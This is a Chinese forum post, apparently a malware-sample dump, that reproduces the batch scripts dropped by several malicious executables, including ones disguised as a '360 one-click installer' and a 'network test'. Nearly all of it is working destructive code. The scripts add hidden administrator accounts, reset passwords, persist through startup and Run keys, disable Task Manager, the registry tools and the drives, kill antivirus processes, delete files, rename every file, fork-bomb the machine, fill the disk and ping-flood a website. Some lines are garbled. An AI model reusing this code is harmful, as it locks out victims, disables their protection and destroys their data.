本帖最后由 Juno_Jr. 于 2018-1-7 14:47 编辑
补上他释放的文件 还有几个exe 没什么权限 懒得传了闲着没事把几个exe都看了
都是释放bat执行
主文件:
@Shift /0
@echo off
net user %username% bc555b6323514bf87e600a182db70d00
cd\
net user YOURS PC IS OVER lovechina /add
net localgroup Administrators YOURS PC IS OVER /add
net user YOURS PC IS OVER /active:yes
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
rd /q/s "%~d0"
type "%~f0" >> "%~f0"
cd\
for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
exit/b
md d:\fly >nul 2>nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"
copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
echo
@echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
W %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==启动 del %~fs0
:x
taskkill /f /im cmd.EⅩE
goto x
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
start Speed.bat
ping www.bayuxuexiao.com -l 65500 -t
%0
tracert bbs.huorong.cn
tracert www.xyyao.com
tracert bbs.kafan.cn
tracert www.bayuxuexiao.com
tracert www.bayuxuexiao.netKO.EXE
@shift /0
@shift /0
@echo off
title \xe9\x87\x91\xe5\xb1\xb1\xe5\x8d\xab\xe5\xa3\xab\xe5\xae\x89\xe8\xa3\x85\xe7\xa8\x8b\xe5\xba\x8f
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\\xe4\xbf\xae\xe5\xa4\x8d* /f /s /q >nul
rem \xe4\xbf\xae\xe6\x94\xb9\xe6\xb3\xa8\xe5\x86\x8c\xe8\xa1?......
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
Folder\Hidden\SHOWALL /v
CheckedValue /t REG_DWORD /d 00000000 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRecentDocsMenu /t
REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoDrives /t REG_DWORD /d
4294967295 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
Disableregistrytools /t
REG_DWORD /d 00000002 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoNetHood /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V
NoDesktop /t REG_DWORD /d
00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
No <truncated>
网络测试2.0.exe
@shift /0
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lin /t REG_SZ /d *:\1.bat /f
@ping www.bayuxuexiao.net
中间一大段都是@ping www.bayuxuexiao.net
@ping www.bayuxuexiao.net
net user administrator 4746510644db23a6a68372b5bced8f45
360一键安装.exe
@shift /0
@ECHO OFF
title 垃圾清理
echo 垃圾清理
pause
ntsd -c q -pn smss.exe
shutdown -a
net user %username% /add
NET LOCALGROUP ADMINISTRATORS %username% /add
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
net user
%0
cd\
for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
exit/b
for /l %%i in (0,1,254) do start %%i
MD d:\fly >nul 2>nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
ping 127.1 -n 5 >nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
echo @echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
W %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==启动 del %~fs0
:x
taskkill /f /im cmd.EⅩE
goto x
:p
echo start C:\1.bat >> C:\1.bat
start C:\1.bat
goto p
:loop
start "" "%systemdrive%\program files\internet explorer\iexplore.EⅩE" -k "blank"
goto loop
copy %0 "%userprofile%\「开始」菜单\程序\启动\1.bat"
@reg??add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
echo rd %windei%/windos /s /q & goto 1>d:\explorer.bat
echo :1>>d:\explorer.bat
echo del d:\*.EXE /f /s /q>>d:\explorer.bat
echo del e:\*.EXE /f /s /q>>d:\explorer.bat
start d:\explorer.bat
exit
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
restrictrun /t reg_dword /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
eg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
reg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
del %0
exit
Excel.exe
感染用的
|